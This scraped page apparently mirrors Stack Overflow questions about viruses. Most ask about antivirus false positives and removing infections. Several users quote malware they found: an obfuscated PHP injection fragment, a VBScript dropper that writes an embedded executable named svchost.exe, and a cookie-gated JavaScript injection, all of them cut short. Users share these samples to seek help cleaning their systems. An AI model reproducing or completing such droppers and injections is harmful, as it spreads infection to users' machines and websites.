virus

My C# program is detected as a virus?

谁说胖子不能爱 提交于 2019-12-09 08:45:52
问题 I have created a C# program and I recently noticed that when I merge my referenced .dlls into one executable .exe file using IL Merge, my Anti Virus (Avast) immediately deletes it and says that it's a virus. I always make lots of back ups so I tested the same thing with a back up from 2 days ago and I didn't experience this problem. So I deleted my recent code line by line and noticed what is triggering the program to be detected as a virus. I have a void where I check if a list of files

AppCertDlls: Process creation slowdown on Win32 caused by virus

三世轮回 提交于 2019-12-08 07:29:20
I've been enjoying a hefty process creation penalty on my Windows XP Home SP3 for about two months. The problem is most manifest and annoying with tasks that do create lots of processes, such as shell scripts (incidentally, bash scripts on Cygwin), Makefiles, or unpacking an IzPack package such as the SpringSource Tool Suite installer (lots of separate unpack200.exe JAR extractor processes). I'm sure it's process creation from observing bash script diagnostic output, or watching processes appear in task manager. There is no noticeable delay once a process is up and running. I've reported that

Malicious code found in PHP files. What does it do?

丶灬走出姿态 提交于 2019-12-08 06:42:48
问题 I discovered this code inserted at the top of every single PHP file on My PHP server. I want to figure out what this script was doing, but I don't know how to decipher the main hidden code. Can someone with experience in these matters decrypt it, because I'm not a programmer? Thank you very much!! link to a sample infected php file: https://drive.google.com/open?id=0B8PYE4BruOdMa2dWZDBLY09VRTA The code is <?php $tdzueclt = 'tvctus)% x24- x24b!>!%y((strstr($uas," x6d 163 x69 145")) or (strstrR

AppCertDlls: Process creation slowdown on Win32 caused by virus

杀马特。学长 韩版系。学妹 提交于 2019-12-08 03:41:47
问题 I've been enjoying a hefty process creation penalty on my Windows XP Home SP3 for about two months. The problem is most manifest and annoying with tasks that do create lots of processes, such as shell scripts (incidentally, bash scripts on Cygwin), Makefiles, or unpacking an IzPack package such as the SpringSource Tool Suite installer (lots of separate unpack200.exe JAR extractor processes). I'm sure it's process creation from observing bash script diagnostic output, or watching processes

C# app appears false positive in AVG antivirus?

谁说胖子不能爱 提交于 2019-12-07 03:57:19
问题 I have created a C# application that I've been testing on my other computer throughout the developing phase. However now that I've completed the app with few recent things that I added, the app is detected as virus (AVG doesn't show what kind of virus). Here are a few changes I did: Added a registry setting to allow user to start the app at Windows Startup. Changed the Assembly Name and Assembly Information (Because I wanted to rename the app). Went into signing settings and clicked on Sign

how to make a MD5 batch virus scanner? [closed]

拥有回忆 提交于 2019-12-06 09:57:40
问题 Closed . This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 3 years ago . So I have done my research on md5 and found this which PieSub quoted MD5 generation code; @echo off for /r %%f in (*) do md5.exe %%f >> output.txt which when I try to generate md5 code for the files in a certain directory this batch (md5.bat) was placed in the result looks like

how to recompile the bootloader of Pyinstaller

流过昼夜 提交于 2019-12-06 04:32:55
问题 I have an AntiVirus false positive problem of my exe file generated using PyInstaller, by searching i found this answer witch consist of recompiling the bootloader and i just can't get it done. This what i've tried so far: try to install C++ build-tools with choco using "choco install -y vcbuildtools" for some reasons the installation failed. installing visual studio community from here then goes to "cd bootloader" and do python ./waf distclean all got the error can't open file './waf':

C# app appears false positive in AVG antivirus?

爱⌒轻易说出口 提交于 2019-12-05 07:46:47
I have created a C# application that I've been testing on my other computer throughout the developing phase. However now that I've completed the app with few recent things that I added, the app is detected as virus (AVG doesn't show what kind of virus). Here are a few changes I did: Added a registry setting to allow user to start the app at Windows Startup. Changed the Assembly Name and Assembly Information (Because I wanted to rename the app). Went into signing settings and clicked on Sign the ClickOnce manifests. Went into security and clicked this is a full trust application. The app is

Remove vbscript or deactivate vbscript from html source code

爷,独闯天下 提交于 2019-12-04 19:53:45
I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data? Edit: Here is the sample of the code <script language="VBScript"><!-- DropFileName = "svchost.exe" WriteData = "4D5A9000030000000400........................8CB03FA48CB03" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO

Unknown javascript files edit

回眸只為那壹抹淺笑 提交于 2019-12-04 18:37:33
All my .js files from my website have been edited without my knowledge, adding this block of code: /* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\ [\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):undefined} function ActerMoto(){var e=navigator.userAgent;var t=e.indexOf("Chrome")>-1||e.indexOf("IEMobile")>-1||e.indexOf("Windows NT 6.2")>-1||e.indexOf("WindowsNT 6.3")>-1||e.indexOf("Windows")<+1;var n=getCookie("lusikrators")===undefined;if(!t&&n)